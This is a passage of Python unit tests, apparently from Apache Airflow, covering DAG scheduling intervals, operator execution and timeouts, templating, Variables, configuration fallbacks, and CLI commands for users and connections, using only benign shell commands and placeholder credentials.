msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
dag.clear()
def test_schedule_dag_relativedelta(self):
"""
Tests scheduling a dag with a relativedelta schedule_interval
"""
delta = relativedelta(hours=+1)
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_relativedelta',
schedule_interval=delta)
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0),
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
dag_run2 = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run2)
self.assertEqual(dag.dag_id, dag_run2.dag_id)
self.assertIsNotNone(dag_run2.run_id)
self.assertNotEqual('', dag_run2.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0) + delta,
dag_run2.execution_date,
msg='dag_run2.execution_date did not match expectation: {0}'
.format(dag_run2.execution_date)
)
self.assertEqual(State.RUNNING, dag_run2.state)
self.assertFalse(dag_run2.external_trigger)
dag.clear()
def test_schedule_dag_fake_scheduled_previous(self):
"""
Test scheduling a dag where there is a prior DagRun
which has the same run_id as the next run should have
"""
delta = timedelta(hours=1)
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_fake_scheduled_previous',
schedule_interval=delta,
start_date=DEFAULT_DATE)
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=DEFAULT_DATE))
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
dag.create_dagrun(run_id=models.DagRun.id_for_date(DEFAULT_DATE),
execution_date=DEFAULT_DATE,
state=State.SUCCESS,
external_trigger=True)
dag_run = scheduler.create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
DEFAULT_DATE + delta,
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
def test_schedule_dag_once(self):
"""
Tests scheduling a dag scheduled for @once - should be scheduled the first time
it is called, and not scheduled the second.
"""
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_once')
dag.schedule_interval = '@once'
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
dag_run2 = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertIsNone(dag_run2)
dag.clear()
def test_fractional_seconds(self):
"""
Tests if fractional seconds are stored in the database
"""
dag = DAG(TEST_DAG_ID + 'test_fractional_seconds')
dag.schedule_interval = '@once'
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
start_date = timezone.utcnow()
run = dag.create_dagrun(
run_id='test_' + start_date.isoformat(),
execution_date=start_date,
start_date=start_date,
state=State.RUNNING,
external_trigger=False
)
run.refresh_from_db()
self.assertEqual(start_date, run.execution_date,
"dag run execution_date loses precision")
self.assertEqual(start_date, run.start_date,
"dag run start_date loses precision ")
def test_schedule_dag_start_end_dates(self):
"""
Tests that an attempt to schedule a task after the Dag's end_date
does not succeed.
"""
delta = timedelta(hours=1)
runs = 3
start_date = DEFAULT_DATE
end_date = start_date + (runs - 1) * delta
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_start_end_dates',
start_date=start_date,
end_date=end_date,
schedule_interval=delta)
dag.add_task(models.BaseOperator(task_id='faketastic',
owner='Also fake'))
# Create and schedule the dag runs
dag_runs = []
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
for i in range(runs):
dag_runs.append(scheduler.create_dag_run(dag))
additional_dag_run = scheduler.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
def test_schedule_dag_no_end_date_up_to_today_only(self):
"""
Tests that a Dag created without an end_date can only be scheduled up
to and including the current datetime.
For example, if today is 2016-01-01 and we are scheduling from a
start_date of 2015-01-01, only jobs up to, but not including
2016-01-01 should be scheduled.
"""
session = settings.Session()
delta = timedelta(days=1)
now = utcnow()
start_date = now.subtract(weeks=1)
runs = (now - start_date).days
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_no_end_date_up_to_today_only',
start_date=start_date,
schedule_interval=delta)
dag.add_task(models.BaseOperator(task_id='faketastic',
owner='Also fake'))
dag_runs = []
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
for i in range(runs):
dag_run = scheduler.create_dag_run(dag)
dag_runs.append(dag_run)
# Mark the DagRun as complete
dag_run.state = State.SUCCESS
session.merge(dag_run)
session.commit()
# Attempt to schedule an additional dag run (for 2016-01-01)
additional_dag_run = scheduler.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
def test_confirm_unittest_mod(self):
self.assertTrue(conf.get('core', 'unit_test_mode'))
def test_pickling(self):
dp = self.dag.pickle()
self.assertEqual(dp.pickle.dag_id, self.dag.dag_id)
def test_rich_comparison_ops(self):
class DAGsubclass(DAG):
pass
dag_eq = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_load_time = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_name = DAG(TEST_DAG_ID + '_neq', default_args=self.args)
dag_subclass = DAGsubclass(TEST_DAG_ID, default_args=self.args)
dag_subclass_diff_name = DAGsubclass(
TEST_DAG_ID + '2', default_args=self.args)
for d in [dag_eq, dag_diff_name, dag_subclass, dag_subclass_diff_name]:
d.last_loaded = self.dag.last_loaded
# test identity equality
self.assertEqual(self.dag, self.dag)
# test dag (in)equality based on _comps
self.assertEqual(dag_eq, self.dag)
self.assertNotEqual(dag_diff_name, self.dag)
self.assertNotEqual(dag_diff_load_time, self.dag)
# test dag inequality based on type even if _comps happen to match
self.assertNotEqual(dag_subclass, self.dag)
# a dag should equal an unpickled version of itself
d = pickle.dumps(self.dag)
self.assertEqual(pickle.loads(d), self.dag)
# dags are ordered based on dag_id no matter what the type is
self.assertLess(self.dag, dag_diff_name)
self.assertGreater(self.dag, dag_diff_load_time)
self.assertLess(self.dag, dag_subclass_diff_name)
# greater than should have been created automatically by functools
self.assertGreater(dag_diff_name, self.dag)
# hashes are non-random and match equality
self.assertEqual(hash(self.dag), hash(self.dag))
self.assertEqual(hash(dag_eq), hash(self.dag))
self.assertNotEqual(hash(dag_diff_name), hash(self.dag))
self.assertNotEqual(hash(dag_subclass), hash(self.dag))
def test_check_operators(self):
conn_id = "sqlite_default"
captainHook = BaseHook.get_hook(conn_id=conn_id)
captainHook.run("CREATE TABLE operator_test_table (a, b)")
captainHook.run("insert into operator_test_table values (1,2)")
t = CheckOperator(
task_id='check',
sql="select count(*) from operator_test_table",
conn_id=conn_id,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
t = ValueCheckOperator(
task_id='value_check',
pass_value=95,
tolerance=0.1,
conn_id=conn_id,
sql="SELECT 100",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
captainHook.run("drop table operator_test_table")
def test_clear_api(self):
task = self.dag_bash.tasks[0]
task.clear(
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE,
upstream=True, downstream=True)
ti = models.TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.are_dependents_done()
def test_illegal_args(self):
"""
Tests that Operators reject illegal arguments
"""
with self.assertWarns(PendingDeprecationWarning) as cm:
task = BashOperator(
task_id='test_illegal_args',
bash_command='echo success',
dag=self.dag,
illegal_argument_1234='hello?')
assert task, "The task should be created."
warning = cm.warning
assert "Invalid arguments were passed to BashOperator " \
"(task_id: test_illegal_args). Support for passing such arguments will be dropped " \
"in Airflow 2.0. Invalid arguments were:\n" \
"*args: ()\n" \
"**kwargs: {'illegal_argument_1234': 'hello?'}" == warning.args[0]
def test_bash_operator(self):
t = BashOperator(
task_id='test_bash_operator',
bash_command="echo success",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_multi_byte_output(self):
t = BashOperator(
task_id='test_multi_byte_bash_operator',
bash_command=u"echo \u2600",
dag=self.dag,
output_encoding='utf-8')
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_kill(self):
import psutil
sleep_time = "100%d" % os.getpid()
t = BashOperator(
task_id='test_bash_operator_kill',
execution_timeout=timedelta(seconds=1),
bash_command="/bin/bash -c 'sleep %s'" % sleep_time,
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
sleep(2)
pid = -1
for proc in psutil.process_iter():
if proc.cmdline() == ['sleep', sleep_time]:
pid = proc.pid
if pid != -1:
os.kill(pid, signal.SIGTERM)
self.fail("BashOperator's subprocess still running after stopping on timeout!")
def test_on_failure_callback(self):
# Annoying workaround for nonlocal not existing in python 2
data = {'called': False}
def check_failure(context, test_case=self):
data['called'] = True
error = context.get('exception')
test_case.assertIsInstance(error, AirflowException)
t = BashOperator(
task_id='check_on_failure_callback',
bash_command="exit 1",
dag=self.dag,
on_failure_callback=check_failure)
self.assertRaises(
exceptions.AirflowException,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
self.assertTrue(data['called'])
def test_trigger_dagrun(self):
def trigga(context, obj):
if True:
return obj
t = TriggerDagRunOperator(
task_id='test_trigger_dagrun',
trigger_dag_id='example_bash_operator',
python_callable=trigga,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_dryrun(self):
t = BashOperator(
task_id='test_dryrun',
bash_command="echo success",
dag=self.dag)
t.dry_run()
def test_sqlite(self):
import airflow.operators.sqlite_operator
t = airflow.operators.sqlite_operator.SqliteOperator(
task_id='time_sqlite',
sql="CREATE TABLE IF NOT EXISTS unitest (dummy VARCHAR(20))",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_timeout(self):
t = PythonOperator(
task_id='test_timeout',
execution_timeout=timedelta(seconds=1),
python_callable=lambda: sleep(5),
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_python_op(self):
def test_py_op(templates_dict, ds, **kwargs):
if not templates_dict['ds'] == ds:
raise Exception("failure")
t = PythonOperator(
task_id='test_py_op',
provide_context=True,
python_callable=test_py_op,
templates_dict={'ds': "{{ ds }}"},
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_complex_template(self):
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field['bar'][1],
context['ds'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field={
'foo': '123',
'bar': ['baz', '{{ ds }}']
},
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_non_bool(self):
"""
Test templates can handle objects with no sense of truthiness
"""
class NonBoolObject(object):
def __len__(self):
return NotImplemented
def __bool__(self):
return NotImplemented
t = OperatorSubclass(
task_id='test_bad_template_obj',
some_templated_field=NonBoolObject(),
dag=self.dag)
t.resolve_template_files()
def test_task_get_template(self):
TI = models.TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
ti.dag = self.dag_bash
ti.run(ignore_ti_state=True)
context = ti.get_template_context()
# DEFAULT DATE is 2015-01-01
self.assertEqual(context['ds'], '2015-01-01')
self.assertEqual(context['ds_nodash'], '20150101')
# next_ds is 2015-01-02 as the dag interval is daily
self.assertEqual(context['next_ds'], '2015-01-02')
self.assertEqual(context['next_ds_nodash'], '20150102')
# prev_ds is 2014-12-31 as the dag interval is daily
self.assertEqual(context['prev_ds'], '2014-12-31')
self.assertEqual(context['prev_ds_nodash'], '20141231')
self.assertEqual(context['ts'], '2015-01-01T00:00:00+00:00')
self.assertEqual(context['ts_nodash'], '20150101T000000')
self.assertEqual(context['ts_nodash_with_tz'], '20150101T000000+0000')
self.assertEqual(context['yesterday_ds'], '2014-12-31')
self.assertEqual(context['yesterday_ds_nodash'], '20141231')
self.assertEqual(context['tomorrow_ds'], '2015-01-02')
self.assertEqual(context['tomorrow_ds_nodash'], '20150102')
def test_import_examples(self):
self.assertEqual(len(self.dagbag.dags), NUM_EXAMPLE_DAGS)
def test_local_task_job(self):
TI = models.TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
job = jobs.LocalTaskJob(task_instance=ti, ignore_ti_state=True)
job.run()
def test_raw_job(self):
TI = models.TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
ti.dag = self.dag_bash
ti.run(ignore_ti_state=True)
def test_variable_set_get_round_trip(self):
Variable.set("tested_var_set_id", "Monday morning breakfast")
self.assertEqual("Monday morning breakfast", Variable.get("tested_var_set_id"))
def test_variable_set_existing_value_to_blank(self):
test_value = 'Some value'
test_key = 'test_key'
Variable.set(test_key, test_value)
Variable.set(test_key, '')
self.assertEqual('', Variable.get('test_key'))
def test_variable_set_get_round_trip_json(self):
value = {"a": 17, "b": 47}
Variable.set("tested_var_set_id", value, serialize_json=True)
self.assertEqual(value, Variable.get("tested_var_set_id", deserialize_json=True))
def test_get_non_existing_var_should_return_default(self):
default_value = "some default val"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value))
def test_get_non_existing_var_should_raise_key_error(self):
with self.assertRaises(KeyError):
Variable.get("thisIdDoesNotExist")
def test_get_non_existing_var_with_none_default_should_return_none(self):
self.assertIsNone(Variable.get("thisIdDoesNotExist", default_var=None))
def test_get_non_existing_var_should_not_deserialize_json_default(self):
default_value = "}{ this is a non JSON default }{"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value,
deserialize_json=True))
def test_variable_setdefault_round_trip(self):
key = "tested_var_setdefault_1_id"
value = "Monday morning breakfast in Paris"
Variable.setdefault(key, value)
self.assertEqual(value, Variable.get(key))
def test_variable_setdefault_round_trip_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Hapiness": True}
Variable.setdefault(key, value, deserialize_json=True)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_variable_setdefault_existing_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Hapiness": True}
Variable.set(key, value, serialize_json=True)
val = Variable.setdefault(key, value, deserialize_json=True)
# Check the returned value, and the stored value are handled correctly.
self.assertEqual(value, val)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_variable_delete(self):
key = "tested_var_delete"
value = "to be deleted"
# No-op if the variable doesn't exist
Variable.delete(key)
with self.assertRaises(KeyError):
Variable.get(key)
# Set the variable
Variable.set(key, value)
self.assertEqual(value, Variable.get(key))
# Delete the variable
Variable.delete(key)
with self.assertRaises(KeyError):
Variable.get(key)
def test_parameterized_config_gen(self):
cfg = parameterized_config(DEFAULT_CONFIG)
# making sure some basic building blocks are present:
self.assertIn("[core]", cfg)
self.assertIn("dags_folder", cfg)
self.assertIn("sql_alchemy_conn", cfg)
self.assertIn("fernet_key", cfg)
# making sure replacement actually happened
self.assertNotIn("{AIRFLOW_HOME}", cfg)
self.assertNotIn("{FERNET_KEY}", cfg)
def test_config_use_original_when_original_and_fallback_are_present(self):
self.assertTrue(conf.has_option("core", "FERNET_KEY"))
self.assertFalse(conf.has_option("core", "FERNET_KEY_CMD"))
FERNET_KEY = conf.get('core', 'FERNET_KEY')
with conf_vars({('core', 'FERNET_KEY_CMD'): 'printf HELLO'}):
FALLBACK_FERNET_KEY = conf.get(
"core",
"FERNET_KEY"
)
self.assertEqual(FERNET_KEY, FALLBACK_FERNET_KEY)
def test_config_throw_error_when_original_and_fallback_is_absent(self):
self.assertTrue(conf.has_option("core", "FERNET_KEY"))
self.assertFalse(conf.has_option("core", "FERNET_KEY_CMD"))
with conf_vars({('core', 'fernet_key'): None}):
with self.assertRaises(AirflowConfigException) as cm:
conf.get("core", "FERNET_KEY")
exception = str(cm.exception)
message = "section/key [core/fernet_key] not found in config"
self.assertEqual(message, exception)
def test_config_override_original_when_non_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = "some value"
self.assertNotIn(key, os.environ)
os.environ[key] = value
FERNET_KEY = conf.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
# restore the envvar back to the original state
del os.environ[key]
def test_config_override_original_when_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = ""
self.assertNotIn(key, os.environ)
os.environ[key] = value
FERNET_KEY = conf.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
# restore the envvar back to the original state
del os.environ[key]
def test_round_time(self):
rt1 = round_time(datetime(2015, 1, 1, 6), timedelta(days=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt1)
rt2 = round_time(datetime(2015, 1, 2), relativedelta(months=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt2)
rt3 = round_time(datetime(2015, 9, 16, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 16, 0, 0), rt3)
rt4 = round_time(datetime(2015, 9, 15, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 15, 0, 0), rt4)
rt5 = round_time(datetime(2015, 9, 14, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt5)
rt6 = round_time(datetime(2015, 9, 13, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt6)
def test_infer_time_unit(self):
self.assertEqual('minutes', infer_time_unit([130, 5400, 10]))
self.assertEqual('seconds', infer_time_unit([110, 50, 10, 100]))
self.assertEqual('hours', infer_time_unit([100000, 50000, 10000, 20000]))
self.assertEqual('days', infer_time_unit([200000, 100000]))
def test_scale_time_units(self):
# use assert_almost_equal from numpy.testing since we are comparing
# floating point arrays
arr1 = scale_time_units([130, 5400, 10], 'minutes')
assert_array_almost_equal(arr1, [2.167, 90.0, 0.167], decimal=3)
arr2 = scale_time_units([110, 50, 10, 100], 'seconds')
assert_array_almost_equal(arr2, [110.0, 50.0, 10.0, 100.0], decimal=3)
arr3 = scale_time_units([100000, 50000, 10000, 20000], 'hours')
assert_array_almost_equal(arr3, [27.778, 13.889, 2.778, 5.556],
decimal=3)
arr4 = scale_time_units([200000, 100000], 'days')
assert_array_almost_equal(arr4, [2.315, 1.157], decimal=3)
def test_bad_trigger_rule(self):
with self.assertRaises(AirflowException):
DummyOperator(
task_id='test_bad_trigger',
trigger_rule="non_existent",
dag=self.dag)
def test_terminate_task(self):
"""If a task instance's db state get deleted, it should fail"""
TI = models.TaskInstance
dag = self.dagbag.dags.get('test_utils')
task = dag.task_dict.get('sleeps_forever')
ti = TI(task=task, execution_date=DEFAULT_DATE)
job = jobs.LocalTaskJob(
task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
# Running task instance asynchronously
p = multiprocessing.Process(target=job.run)
p.start()
sleep(5)
settings.engine.dispose()
session = settings.Session()
ti.refresh_from_db(session=session)
# making sure it's actually running
self.assertEqual(State.RUNNING, ti.state)
ti = session.query(TI).filter_by(
dag_id=task.dag_id,
task_id=task.task_id,
execution_date=DEFAULT_DATE
).one()
# deleting the instance should result in a failure
session.delete(ti)
session.commit()
# waiting for the async task to finish
p.join()
# making sure that the task ended up as failed
ti.refresh_from_db(session=session)
self.assertEqual(State.FAILED, ti.state)
session.close()
def test_task_fail_duration(self):
"""If a task fails, the duration should be recorded in TaskFail"""
p = BashOperator(
task_id='pass_sleepy',
bash_command='sleep 3',
dag=self.dag)
f = BashOperator(
task_id='fail_sleepy',
bash_command='sleep 5',
execution_timeout=timedelta(seconds=3),
retry_delay=timedelta(seconds=0),
dag=self.dag)
session = settings.Session()
try:
p.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except Exception:
pass
try:
f.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except Exception:
pass
p_fails = session.query(TaskFail).filter_by(
task_id='pass_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
f_fails = session.query(TaskFail).filter_by(
task_id='fail_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
self.assertEqual(0, len(p_fails))
self.assertEqual(1, len(f_fails))
self.assertGreaterEqual(sum([f.duration for f in f_fails]), 3)
def test_run_command(self):
if six.PY3:
write = r'sys.stdout.buffer.write("\u1000foo".encode("utf8"))'
else:
write = r'sys.stdout.write(u"\u1000foo".encode("utf8"))'
cmd = 'import sys; {0}; sys.stdout.flush()'.format(write)
self.assertEqual(run_command("python -c '{0}'".format(cmd)),
u'\u1000foo' if six.PY3 else 'foo')
self.assertEqual(run_command('echo "foo bar"'), u'foo bar\n')
self.assertRaises(AirflowConfigException, run_command, 'bash -c "exit 1"')
def test_trigger_dagrun_with_execution_date(self):
utc_now = timezone.utcnow()
run_id = 'trig__' + utc_now.isoformat()
def payload_generator(context, object):
object.run_id = run_id
return object
task = TriggerDagRunOperator(task_id='test_trigger_dagrun_with_execution_date',
trigger_dag_id='example_bash_operator',
python_callable=payload_generator,
execution_date=utc_now,
dag=self.dag)
task.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
dag_runs = models.DagRun.find(dag_id='example_bash_operator',
run_id=run_id)
self.assertEqual(len(dag_runs), 1)
dag_run = dag_runs[0]
self.assertEqual(dag_run.execution_date, utc_now)
def test_trigger_dagrun_with_str_execution_date(self):
utc_now_str = timezone.utcnow().isoformat()
self.assertIsInstance(utc_now_str, six.string_types)
run_id = 'trig__' + utc_now_str
def payload_generator(context, object):
object.run_id = run_id
return object
task = TriggerDagRunOperator(
task_id='test_trigger_dagrun_with_str_execution_date',
trigger_dag_id='example_bash_operator',
python_callable=payload_generator,
execution_date=utc_now_str,
dag=self.dag)
task.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
dag_runs = models.DagRun.find(dag_id='example_bash_operator',
run_id=run_id)
self.assertEqual(len(dag_runs), 1)
dag_run = dag_runs[0]
self.assertEqual(dag_run.execution_date.isoformat(), utc_now_str)
def test_trigger_dagrun_with_templated_execution_date(self):
task = TriggerDagRunOperator(
task_id='test_trigger_dagrun_with_str_execution_date',
trigger_dag_id='example_bash_operator',
execution_date='{{ execution_date }}',
dag=self.dag)
self.assertTrue(isinstance(task.execution_date, six.string_types))
self.assertEqual(task.execution_date, '{{ execution_date }}')
ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.render_templates()
self.assertEqual(timezone.parse(task.execution_date), DEFAULT_DATE)
def test_externally_triggered_dagrun(self):
TI = models.TaskInstance
# Create the dagrun between two "scheduled" execution dates of the DAG
EXECUTION_DATE = DEFAULT_DATE + timedelta(days=2)
EXECUTION_DS = EXECUTION_DATE.strftime('%Y-%m-%d')
EXECUTION_DS_NODASH = EXECUTION_DS.replace('-', '')
dag = DAG(
TEST_DAG_ID,
default_args=self.args,
schedule_interval=timedelta(weeks=1),
start_date=DEFAULT_DATE)
task = DummyOperator(task_id='test_externally_triggered_dag_context',
dag=dag)
dag.create_dagrun(run_id=models.DagRun.id_for_date(EXECUTION_DATE),
execution_date=EXECUTION_DATE,
state=State.RUNNING,
external_trigger=True)
task.run(
start_date=EXECUTION_DATE, end_date=EXECUTION_DATE)
ti = TI(task=task, execution_date=EXECUTION_DATE)
context = ti.get_template_context()
# next_ds/prev_ds should be the execution date for manually triggered runs
self.assertEqual(context['next_ds'], EXECUTION_DS)
self.assertEqual(context['next_ds_nodash'], EXECUTION_DS_NODASH)
self.assertEqual(context['prev_ds'], EXECUTION_DS)
self.assertEqual(context['prev_ds_nodash'], EXECUTION_DS_NODASH)
class CliTests(unittest.TestCase):
@classmethod
def setUpClass(cls):
super(CliTests, cls).setUpClass()
cls._cleanup()
def setUp(self):
super(CliTests, self).setUp()
from airflow.www_rbac import app as application
self.app, self.appbuilder = application.create_app(session=Session, testing=True)
self.app.config['TESTING'] = True
self.parser = cli.CLIFactory.get_parser()
self.dagbag = models.DagBag(dag_folder=DEV_NULL, include_examples=True)
settings.configure_orm()
self.session = Session
def tearDown(self):
self._cleanup(session=self.session)
super(CliTests, self).tearDown()
@staticmethod
def _cleanup(session=None):
if session is None:
session = Session()
session.query(models.Pool).delete()
session.query(models.Variable).delete()
session.commit()
session.close()
def test_cli_list_dags(self):
args = self.parser.parse_args(['list_dags', '--report'])
cli.list_dags(args)
def test_cli_list_dag_runs(self):
cli.trigger_dag(self.parser.parse_args([
'trigger_dag', 'example_bash_operator', ]))
args = self.parser.parse_args(['list_dag_runs',
'example_bash_operator',
'--no_backfill'])
cli.list_dag_runs(args)
def test_cli_create_user_random_password(self):
args = self.parser.parse_args([
'create_user', '-u', 'test1', '-l', 'doe', '-f', 'jon',
'-e', 'jdoe@foo.com', '-r', 'Viewer', '--use_random_password'
])
cli.create_user(args)
def test_cli_create_user_supplied_password(self):
args = self.parser.parse_args([
'create_user', '-u', 'test2', '-l', 'doe', '-f', 'jon',
'-e', 'jdoe@apache.org', '-r', 'Viewer', '-p', 'test'
])
cli.create_user(args)
def test_cli_delete_user(self):
args = self.parser.parse_args([
'create_user', '-u', 'test3', '-l', 'doe', '-f', 'jon',
'-e', 'jdoe@example.com', '-r', 'Viewer', '--use_random_password'
])
cli.create_user(args)
args = self.parser.parse_args([
'delete_user', '-u', 'test3',
])
cli.delete_user(args)
def test_cli_list_users(self):
for i in range(0, 3):
args = self.parser.parse_args([
'create_user', '-u', 'user{}'.format(i), '-l', 'doe', '-f', 'jon',
'-e', 'jdoe+{}@gmail.com'.format(i), '-r', 'Viewer',
'--use_random_password'
])
cli.create_user(args)
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.list_users(self.parser.parse_args(['list_users']))
stdout = mock_stdout.getvalue()
for i in range(0, 3):
self.assertIn('user{}'.format(i), stdout)
@mock.patch("airflow.settings.RBAC", True)
@mock.patch("airflow.bin.cli.DagBag")
def test_cli_sync_perm(self, dagbag_mock):
self.expect_dagbag_contains([
DAG('has_access_control',
access_control={
'Public': {'can_dag_read'}
}),
DAG('no_access_control')
], dagbag_mock)
self.appbuilder.sm = mock.Mock()
args = self.parser.parse_args([
'sync_perm'
])
cli.sync_perm(args)
self.appbuilder.sm.sync_roles.assert_called_once()
self.assertEqual(2,
len(self.appbuilder.sm.sync_perm_for_dag.mock_calls))
self.appbuilder.sm.sync_perm_for_dag.assert_any_call(
'has_access_control',
{'Public': {'can_dag_read'}}
)
self.appbuilder.sm.sync_perm_for_dag.assert_any_call(
'no_access_control',
None,
)
def expect_dagbag_contains(self, dags, dagbag_mock):
dagbag = mock.Mock()
dagbag.dags = {dag.dag_id: dag for dag in dags}
dagbag_mock.return_value = dagbag
def test_cli_list_tasks(self):
for dag_id in self.dagbag.dags.keys():
args = self.parser.parse_args(['list_tasks', dag_id])
cli.list_tasks(args)
args = self.parser.parse_args([
'list_tasks', 'example_bash_operator', '--tree'])
cli.list_tasks(args)
@mock.patch("airflow.bin.cli.db.initdb")
def test_cli_initdb(self, initdb_mock):
cli.initdb(self.parser.parse_args(['initdb']))
initdb_mock.assert_called_once_with(False)
@mock.patch("airflow.bin.cli.db.resetdb")
def test_cli_resetdb(self, resetdb_mock):
cli.resetdb(self.parser.parse_args(['resetdb', '--yes']))
resetdb_mock.assert_called_once_with(False)
def test_cli_connections_list(self):
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(['connections', '--list']))
stdout = mock_stdout.getvalue()
conns = [[x.strip("'") for x in re.findall(r"'\w+'", line)[:2]]
for ii, line in enumerate(stdout.split('\n'))
if ii % 2 == 1]
conns = [conn for conn in conns if len(conn) > 0]
# Assert that some of the connections are present in the output as
# expected:
self.assertIn(['aws_default', 'aws'], conns)
self.assertIn(['beeline_default', 'beeline'], conns)
self.assertIn(['emr_default', 'emr'], conns)
self.assertIn(['mssql_default', 'mssql'], conns)
self.assertIn(['mysql_default', 'mysql'], conns)
self.assertIn(['postgres_default', 'postgres'], conns)
self.assertIn(['wasb_default', 'wasb'], conns)
self.assertIn(['segment_default', 'segment'], conns)
# Attempt to list connections with invalid cli args
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--list', '--conn_id=fake', '--conn_uri=fake-uri',
'--conn_type=fake-type', '--conn_host=fake_host',
'--conn_login=fake_login', '--conn_password=fake_password',
